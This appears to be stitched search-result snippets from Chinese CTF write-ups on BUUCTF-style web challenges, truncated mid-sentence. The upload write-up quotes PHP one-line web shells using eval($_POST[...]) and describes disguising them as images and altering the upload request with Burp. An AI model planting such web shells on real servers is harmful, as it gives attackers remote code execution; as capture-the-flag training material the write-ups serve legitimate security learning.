丢失的MD5 看起来像是Python代码, 然后用Python工具运行一下,就出来了flag。 [ACTF2020 新生赛]Exec 这个和之前做的那道一起来撸猫题很像,直接填上地址试一下,结果真出来了flag。 [极客大挑战 2019]PHP 看了源码也没有什么思绪,不过大佬说selsct进行PHP反序 ...
[极客大挑战 2019]Upload看到后的第一印象肯定是先上传图片马试试<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>构造的语句中不能带有<?这样的话只能是构造一些其他语句了eval($_POST['shell']);上传的格式为image,使用bp抓包进行修改![image.png](https://img-blo. wep php ...